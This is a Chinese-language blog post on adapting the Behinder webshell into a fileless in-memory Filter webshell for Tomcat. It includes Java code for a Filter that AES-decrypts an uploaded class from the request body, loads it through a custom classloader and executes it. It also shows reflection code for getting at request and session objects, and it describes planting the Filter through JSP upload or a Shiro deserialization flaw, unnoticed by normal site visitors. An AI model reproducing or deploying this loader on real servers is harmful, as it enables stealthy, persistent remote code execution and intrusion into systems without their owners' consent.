上一篇文章介绍了Tomcat基于Filter的无文件webshell的demo。Filter的webshell很简单,只是实现了一个简单的命令执行。查找了网上的公开的webshell,发现基于Filter并且功能比较齐全的webshell基本没有。所以萌生了自己魔改冰蝎以适配tomcat内存马的想法。
0x00 反编译冰蝎
- 创建一个maven的项目。pom的依赖如下
junit
junit
4.11
test
org.json
json
20170516
javax.servlet.jsp
jsp-api
2.1
provided
asm
asm-all
3.3.1
javax.servlet
servlet-api
2.5
provided
org.xerial
sqlite-jdbc
3.31.1
org.apache.tomcat.embed
tomcat-embed-core
7.0.25
-
将冰蝎中这几个jar包,拷贝进来。然后记得右键选择 add as library。
-
然后通过idea反编译,将每个class的反编译后的结果,拷贝到项目中。
-
对反编译的结果稍作修改,即可运行。冰蝎的main class在ui.Starter中
结果如图
0x01 改造分析
Filter中只有request与response。session可以通过request去获取,代码如下
((HttpServletRequest)request).getSession()
而冰蝎的原理为,上传一个class字节码,通过调用classloader的defineClass方法,将class字节码,转换为Class。实例化上传的这个类,通过equal方法传递PageContext。equals方法只接受一个参数,通过对这9个对象分析发现,只要传递pageContext进去,便可以间接获取Request、Response、Seesion等对象,如HttpServletRequest request=(HttpServletRequest) pageContext.getRequest();
冰蝎实现命令执行,获取信息等的类在payload.java中,我们随便点开一个看一下
冰蝎主要用到了三个对象,分别是
- request 获取请求
- response 向响应中写入结果
- session session中存放aes加密的密钥
0x02 代码实现
方法一
Filter中的response的请求类型为org.apache.catalina.connector.ResponseFacade。里面有一个response字段,类型为org.apache.catalina.connector.Response。代码如下
在这里我们可以很清晰的看见,构造函数中的参数中存在一个request对象。所以,我们可以从response对象中,间接获取request对象与session对象。idea调试截图
代码实现如下
Field responseField = ResponseFacade.class.getDeclaredField("response");
responseField.setAccessible(true);
org.apache.catalina.connector.Response resp = (Response) responseField.get((ResponseFacade) response);
ServletRequest request = resp.getRequest();
HttpSession session = resp.getRequest().getSession();
Filter中内存马的代码如下
try{
if (u != null) {
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec((u + "").getBytes(), "AES"));
byte[] evilClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
Class evilClass = new U(this.getClass().getClassLoader()).g(evilClassBytes);
evilClass.newInstance().equal(response);
return;
}
} catch (Exception e) {
}
chain.doFilter(request, response);
}
只需要修改payload.java中各个payload的request,response,session改造成上面的代码,重新打包即可。
当然,这种方法存在神坑,会一直报错,如下
方法二
修改冰蝎的payload,不再使用equal方法作为执行payload的入口点。添加一个方法,参数如下
public boolean fuck(ServletRequest request, ServletResponse response)
payload中替换一下response与request。内存马中可以这样写
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec((u + "").getBytes(), "AES"));
byte[] evilClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
Class evilClass = new U(this.getClass().getClassLoader()).g(evilClassBytes);
Object a = evilClass.newInstance();
Method b = evilClass.getDeclaredMethod("fuck", ServletRequest.class, ServletResponse.class);
b.invoke(a, request, response);
return;
这样就可以解决那个神坑问题,一切ok
0x03 成果检验
将生成的Filter使用jsp或者shiro反序列化漏洞,加载至tomcat系统中。
正常访问网站
一切正常,没有任何问题
通过冰蝎访问网站,url处随便写,如图
访问,如图所示
当然,因为这个是魔改的程序,没有经过原作者允许就去公开,可能不太好。所以目前只限于内部交流,暂时还没有想法公开给大家。一切只是抛砖引玉,实现的方法还有很多。希望大佬轻拍
